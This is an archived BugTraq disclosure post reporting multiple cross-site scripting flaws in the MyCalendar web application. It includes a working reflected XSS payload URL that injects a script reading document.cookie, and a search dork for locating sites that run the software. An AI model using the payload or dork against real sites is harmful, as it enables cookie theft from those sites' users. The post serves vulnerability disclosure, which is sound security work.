BugTraq
MyCalendar multiple XSS Feb 19 2007 10:13PM
sn0oPy team gmail com
* MyCalendar multiple XSS

* By : sn0oPy

* Risk : medium

* site : http://abledesign.com/programs/MyCalendar/

* exploit :

XSS on the search menu : http://www.target.ma/calendar/index.php?go=search
XSS on the url : http://www.target.ma/calendar/index.php?go="><script>alert(document.cook
ie)</script>
XSS on the username and password at http://www.target.ma/crown/cal/index.php?go=Login

* dork : intitle:"myCalendar"

* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]

* Site : http://forums.avenir-geopolitique.net

* greetz : [subzero], Avg Team.

* Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2686

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus